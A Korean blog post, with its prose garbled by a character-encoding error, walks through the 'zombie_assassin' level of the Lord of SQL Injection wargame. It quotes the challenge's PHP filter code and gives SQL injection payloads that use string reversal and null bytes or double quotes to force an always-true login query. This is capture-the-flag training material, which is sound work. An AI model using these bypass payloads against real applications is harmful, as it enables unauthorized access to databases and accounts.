ํ‹ฐ์Šคํ† ๋ฆฌ ๋ทฐ

17๋ฒˆ์งธ ๋ฌธ์ œ์ธ "zombie_assassin"์ž…๋‹ˆ๋‹ค.

 

$_GET['id'] = strrev(addslashes($_GET['id']));
$_GET['pw'] = strrev(addslashes($_GET['pw']));

์ž…๋ ฅ๋œ ๊ฐ’์„ ๋ฐ›๋Š” ๋ณ€์ˆ˜๋Š” "id"์™€ "pw"๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค.

"addslashes" ํ•จ์ˆ˜์— ์˜ํ•ด '(์‹ฑ๊ธ€ ์ฟผํ„ฐ), "(๋”๋ธ” ์ฟผํ„ฐ), \(์—ญ ์Šฌ๋ž˜์‰ฌ), null์˜ ์ž…๋ ฅ๊ฐ’์— --> "\"๋ฅผ ์ถ”๊ฐ€ํ•ด์คŒ์œผ๋กœ์จ ๋‹จ์ˆœ "๋ฌธ์ž์—ด"๋กœ ์ธ์‹ํ•˜๊ฒŒ ๋งŒ๋“ค์–ด์ฃผ๊ณ  ์žˆ์œผ๋ฉฐ "strrev" ํ•จ์ˆ˜๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์–ด ์ž…๋ ฅ๋ฐ›์€ ๋ฌธ์ž์—ด์„ ์•ž๋’ค๋กœ ๋ฐ”๊ฟ”๋ฒ„๋ฆฌ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค/

 

if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");

๋˜ํ•œ 2๊ฐ€์ง€์˜ ๋ณ€์ˆ˜์— preg_match ํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด ' _ . ()๋ฅผ ๊ฒ€์ฆํ•˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์ ‘๊ทผ์ด ์‰ฝ์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

 

$query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
if($result['id']) solve("zombie_assassin"); 

ํ•ด๋‹น ๋ฌธ์ œ๋ฅผ ํ•ด๊ฒฐํ•˜๊ธฐ ์œ„ํ•ด์„  ์‹คํ–‰ ๊ฐ€๋Šฅํ•œ ์™„๋ฒฝํ•œ ์ฟผ๋ฆฌ๋ฌธ์œผ๋กœ ๋งŒ๋“ค๊ธฐ๋งŒ ํ•˜๋ฉด ๋˜๊ธฐ์— ํŠน์ • ๊ณ„์ •์ด ์•„๋‹Œ ์•„๋ฌด ๊ณ„์ •์œผ๋กœ ์ ‘๊ทผํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค.

 

succubus ๋ฌธ์ œ์ฒ˜๋Ÿผ id๋ถ€ํ„ฐ pw ๋ณ€์ˆ˜๊นŒ์ง€ ๊ตฌ๋ฌธ์„ ๋ฌธ์ž์—ด๋กœ ์ธ์‹ํ•˜๊ฒŒ ํ•ด์„œ ์šฐํšŒํ•˜๊ณ  ์–ธ์ œ๋‚˜ "์ฐธ"์œผ๋กœ ๋˜๊ฒŒ๋” ํ•ด์ฃผ๋ฉด ๋  ๊ฒƒ ๊ฐ™์ง€๋งŒ "addslashes" ํ•จ์ˆ˜ ๋•์— \ -> \\ ๋กœ ๋ฐ”๋€Œ์–ด ๋ฒ„๋ฆฌ๊ธฐ ๋•Œ๋ฌธ์— ์‹คํŒจํ•ฉ๋‹ˆ๋‹ค.

 

๋ฐฉ๋ฒ•์„ ์ฐพ์•„๋ณธ ๊ฒฐ๊ณผ ๋ฌธ์ž์—ด์„ ๋’ค์ง‘์–ด ์ฃผ๋Š” "strrev" ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•ด์„œ ์ž„์˜์˜ ๊ตฌ๋ฌธ์„ ๋ฌธ์ž์—ด๋กœ ์ธ์‹ํ•˜๊ฒŒ ํ•  ์ˆ˜ ์žˆ์„ ๊ฒƒ ๊ฐ™๋‹ค๋Š” ์ƒ๊ฐ์ด ๋“ค์—ˆ์Šต๋‹ˆ๋‹ค.

 

id='\'' and pw='' ->  id=''\' and pw='' ์‹์œผ๋กœ ์ž…๋ ฅ๋œ ๊ฐ’์„ ๋’ค์ง‘์–ด ๋ฒ„๋ฆฌ๋Š”๋ฐ

 

๋งŒ์ผ %00(null) ๋˜๋Š” "(๋”๋ธ” ์ฟผํ„ฐ) ๊ฐ’์„ ๋„ฃ๊ฒŒ ๋˜๋ฉด
id='\"' and pw='' -> id='"\' and pw='' or 1=1#
์‹์œผ๋กœ ๋ฉ๋‹ˆ๋‹ค. ์ฆ‰ ๋…ธ๋ž€ ๋ถ€๋ถ„์ธ id='(์‹ฑ๊ธ€ ์ฟผํ„ฐ) ~ pw='(์‹ฑ๊ธ€ ์ฟผํ„ฐ๋ฌธ์ž์—ด๋กœ ์ธ์‹ํ•˜๊ธฐ ๋•Œ๋ฌธ์— ๊ทธ ๋’ค์˜ ๊ตฌ๋ฌธ์ธ " ์ฐธ " ๊ฐ’์ด ๋ฐ”๋กœ ์‹คํ–‰๋˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

 

Exploit Code

IN -> select id from prob_zombie_assassin where id=%00&pw=%23eurt ro

OUT -> select id from prob_zombie_assassin where id='0\'&pw='or true #'

 

IN -> select id from prob_zombie_assassin where id="&pw=%231=1 ro

OUT -> select id from prob_zombie_assassin where id='"\' and pw='or 1=1#'

'CHALLENGE' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[LOS] Nightmare ํ’€์ด(18)  (0) 2020.12.10
XSS Challenges 7  (0) 2020.12.10
[LOS] Succubus ํ’€์ด(16)  (0) 2020.12.09
[LOS] Assassin ํ’€์ด(15)  (0) 2020.12.09
XSS Challenges 6  (0) 2020.12.09
๊ณต์œ ํ•˜๊ธฐ ๋งํฌ
Comment